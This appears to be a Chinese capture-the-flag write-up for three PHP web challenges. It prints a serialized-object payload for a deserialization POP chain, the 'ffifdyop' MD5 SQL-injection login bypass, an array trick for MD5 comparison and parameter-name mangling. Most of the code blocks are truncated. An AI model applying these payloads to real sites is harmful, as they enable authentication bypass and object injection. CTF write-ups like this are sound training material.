LovePopChain
简单的反序列化一枚
1 | <?php |
注意的是,由于php版本的问题,传的参数应是No[Need.For.Love
1 | ?No[Need.For.Love=O:8:"MyObject":2:{s:6:"NoLove";O:5:"hybcx":2:{s:6:"JiuYue";N;s:2:"Si";O:8:"MyObject":2:{s:6:"NoLove";N;s:6:"Forgzy";N;}}s:6:"Forgzy";N;} |
find-the-id
写个脚本爆破
1 | import requests |
然后得到flag了
ez_md5
password进行了md5加密
我们想到了两个特殊的md5
1 | 数字型:129581926211651571912466741651878684928 |
他们都含有or结构,可以绕过sql注入
我们提交ffifdyop后得到了源码
1 | <?php |
我们先了解一下$_REQUEST是什么东西
1 | $_REQUEST 变量包含了 $_GET、$_POST 和 $_COOKIE 的内容。 |
我们发现页面原本就有了回显
我们猜测cookie含有字母,我们修改cookie为1,就绕过了正则匹配
然后第一个if是md5碰撞
我们用数组过滤了
1 | ?a[]=1&b[]=2 |
然后我们需要md5($_POST[‘Build_CTF.com’]) == “3e41f780146b6c246cd49dd296a3da28”)
页面还给了提示,我们查看robots.txt
我们得到了部分要传的数据
我们进行爆破
1 | <?php |
得到要传的数据
1 | Build[CTF.com=1145146803531 |
由于php版本问题,Build_CTF.com的_要改为[